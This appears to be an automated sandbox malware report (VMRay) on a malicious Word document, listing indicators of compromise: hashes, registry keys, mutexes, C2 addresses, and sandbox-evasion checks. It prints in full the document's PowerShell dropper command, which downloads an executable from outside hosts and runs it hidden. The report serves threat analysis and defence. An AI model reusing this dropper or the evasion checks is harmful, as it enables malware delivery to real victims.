SYSTEM\CurrentControlSet\Services\EventLog\System HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Application HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Media Center HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\OAlerts HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\System HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Application HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Media Center HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\OAlerts HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\System HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Application HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Media Center HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\OAlerts HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\System HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\PowerShell\1\PowerShellEngine HKEY_LOCAL_MACHINE ApplicationBase ApplicationBase WinRegistryKey Software\Microsoft\PowerShell\1\PowerShellEngine HKEY_LOCAL_MACHINE ApplicationBase ApplicationBase WinRegistryKey SOFTWARE\Microsoft\PowerShell\1\ShellIds HKEY_LOCAL_MACHINE PipelineMaxStackSizeMB WinRegistryKey Software\Microsoft\Windows NT\CurrentVersion HKEY_LOCAL_MACHINE InstallationType InstallationType WinRegistryKey SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance HKEY_LOCAL_MACHINE Library Library IsMultiInstance IsMultiInstance First Counter First Counter WinRegistryKey SYSTEM\CurrentControlSet\Services\.net clr networking\Performance HKEY_LOCAL_MACHINE CategoryOptions CategoryOptions FileMappingSize FileMappingSize Counter Names WinRegistryKey HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Microsoft\PowerShell\1\ShellIds HKEY_LOCAL_MACHINE PipelineMaxStackSizeMB DNSRecord www.events4u.cz SocketAddress 93.185.102.11 80 TCP NetworkSocket 93.185.102.11 80 TCP Contains SocketAddress www.events4u.cz 80 NetworkConnection HTTP www.events4u.cz 80 URI www.events4u.cz/kas23.png Contains URI None File users\adu0vk iwa5kls\appdata\roaming\winapp users\adu0vk iwa5kls\appdata\roaming\winapp c:\ c:\users\adu0vk iwa5kls\appdata\roaming\winapp File users\adu0vk iwa5kls\desktop users\adu0vk iwa5kls\desktop c:\ c:\users\adu0vk iwa5kls\desktop File users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe c:\ c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe exe MD5 0ebfd6e45dea48c7f54b5574d69da458 SHA1 11ad0fae8318bc72e1525c161c5df72a9da9430b SHA256 3ba1b55c3268529b586e154b9117d25ae6c3667a2e869747c51bd88fd2a7a581 Copied_To File users\adu0vk~1\appdata\local\temp\mvmubw.exe users\adu0vk~1\appdata\local\temp\mvmubw.exe c:\ c:\users\adu0vk~1\appdata\local\temp\mvmubw.exe exe Copied_From WinRegistryKey SOFTWARE\Microsoft\Windows NT\CurrentVersion\ HKEY_LOCAL_MACHINE ProductName ProductName ProductName ProductName File users\adu0vk iwa5kls\appdata\roaming\winapp users\adu0vk iwa5kls\appdata\roaming\winapp c:\ c:\users\adu0vk iwa5kls\appdata\roaming\winapp File users\adu0vk iwa5kls\appdata\roaming\winapp\client_id users\adu0vk iwa5kls\appdata\roaming\winapp\client_id c:\ c:\users\adu0vk iwa5kls\appdata\roaming\winapp\client_id MD5 c9e2607b0faa2a1d36e4ebc553f41698 SHA1 b8c4d60f72d70bbf8ce3ff1e16f7fe659cda9821 SHA256 fa6c18a934575a42088ed671a0bb0de633b8f00e1226a38596f6b625c1455e3e File users\adu0vk iwa5kls\appdata\roaming\client_id users\adu0vk iwa5kls\appdata\roaming\client_id c:\ c:\users\adu0vk iwa5kls\appdata\roaming\client_id File users\adu0vk iwa5kls\appdata\roaming\winapp\config.conf users\adu0vk iwa5kls\appdata\roaming\winapp\config.conf c:\ c:\users\adu0vk iwa5kls\appdata\roaming\winapp\config.conf conf File users\adu0vk iwa5kls\appdata\roaming\winapp\group_tag users\adu0vk iwa5kls\appdata\roaming\winapp\group_tag c:\ c:\users\adu0vk iwa5kls\appdata\roaming\winapp\group_tag MD5 20d4581a76fac9a75b1300485c2c2ce4 SHA1 56f0501fc59c0a9f5f6967cd7f03e5d4f5b8adf6 SHA256 60e79d113cf1adb6e594a3ab1eef644f274cfaf004b576b6592da7aa6119b67d File users\adu0vk iwa5kls\appdata\roaming\group_tag users\adu0vk iwa5kls\appdata\roaming\group_tag c:\ c:\users\adu0vk iwa5kls\appdata\roaming\group_tag File users\adu0vk iwa5kls\appdata\roaming\winapp\modules users\adu0vk iwa5kls\appdata\roaming\winapp\modules c:\ c:\users\adu0vk iwa5kls\appdata\roaming\winapp\modules Mutex Global\VLock SocketAddress 89.231.13.38 449 NetworkConnection HTTP 89.231.13.38 449 SocketAddress myexternalip.com 0 NetworkConnection HTTP myexternalip.com 0 SocketAddress 212.38.166.20 447 NetworkConnection HTTP 212.38.166.20 447 URI 89.231.13.38/kas23/AUFDDCNTXWT_W617601.2B0207B83DB3421BDB30AED0283B84A5/5/spk/ Contains URI 89.231.13.38/kas23/AUFDDCNTXWT_W617601.2B0207B83DB3421BDB30AED0283B84A5/0/Windows 7 x64 SP1/1031/87.142.156.87/4E7D329059DDCB1E5EC37D3CBBDFA46E247E2279DF57EA2055D11096E05BBEDA/ChqJujn6xjr2PYFE7lelOT6D/ Contains URI myexternalip.com/raw Contains URI 212.38.166.20/kas23/AUFDDCNTXWT_W617601.2B0207B83DB3421BDB30AED0283B84A5/5/systeminfo64/ Contains Analyzed Sample #19183 Malware Artifacts 19183 Sample-ID: #19183 Job-ID: #9414 payload_comparison This sample was analyzed by VMRay Analyzer 2.2.0 on a Windows 7 system 0 VTI Score based on VTI Database Version 2.6 Metadata of Sample File #19183 Submission-ID: #19318 C:\Users\aDU0VK IWA5kLS\Desktop\2f031c6eb15cf2ca7855375d8bffe4d7a3b9b7ba95dc7d23e80f29b3d424a8ca.doc doc MD5 8c16de37cccc9788384adb61c118ba2c SHA1 c54b16bd6a507bbbb832c4c62b894f426acecf31 SHA256 2f031c6eb15cf2ca7855375d8bffe4d7a3b9b7ba95dc7d23e80f29b3d424a8ca Opened_By Metadata of Analysis for Job-ID #9414 Timeout False x86 64-bit win7_64_sp1-mso2013 True Windows 7 6.1.7601.17514 (3844dbb9-2017-4967-be7a-a4a2c20430fa) 147.664 This is a property collection for additional information of VMRay analysis VMRay Analyzer Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process "cmd /c PowerShell "'PowerShell ""function mihyr8([String] $yxuinzaisib){(New-Object System.Net.WebClient).DownloadFile($yxuinzaisib,''%TMP%\Mvmubw.exe'');Start-Process ''%TMP%\Mvmubw.exe'';}try{mihyr8(''http://www.events4u.cz/kas23.png'')}catch{mihyr8(''http://tregartha-dinnie.co.uk/kas23.png'')}'"" | Out-File -encoding ASCII -FilePath %TMP%\Mbovxo.bat;Start-Process '%TMP%\Mbovxo.bat' -WindowStyle Hidden"". Create process Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe". Create process Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process "C:\Users\ADU0VK~1\AppData\Local\Temp\Mbovxo.bat". Create process Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name "Global\.net clr networking". Create system object Network VTI rule match with VTI rule score 3/5 vmray_request_dns_by_name Resolve host name "www.events4u.cz". Perform DNS request Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process "C:\Users\ADU0VK~1\AppData\Local\Temp\Mvmubw.exe". Create process Anti Analysis VTI rule match with VTI rule score 5/5 vmray_detect_application_sandbox_by_dll Possibly trying to detect "Sandboxie" by checking for existence of module "SbieDll.dll". Try to detect application sandbox Anti Analysis VTI rule match with VTI rule score 5/5 vmray_detect_application_sandbox_by_dll Possibly trying to detect "Threatexpert" by checking for existence of module "dbghelp.dll". Try to detect application sandbox Anti Analysis VTI rule match with VTI rule score 5/5 vmray_detect_forensic_tool_by_module Check the existence of DLL "SunBelt Sandbox". Try to detect forensic tool Anti Analysis VTI rule match with VTI rule score 5/5 vmray_detect_forensic_tool_by_module Check the existence of DLL "Winsock Packet Editor". Try to detect forensic tool Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process "C:\Users\aDU0VK IWA5kLS\AppData\Roaming\winapp\Mvnucw.exe". Create process Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process "svchost.exe". Create process Process VTI rule match with VTI rule score 4/5 vmray_read_from_remote_process "c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe" reads from "svchost.exe". Read from memory of another process Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name "Global\VLock". Create system object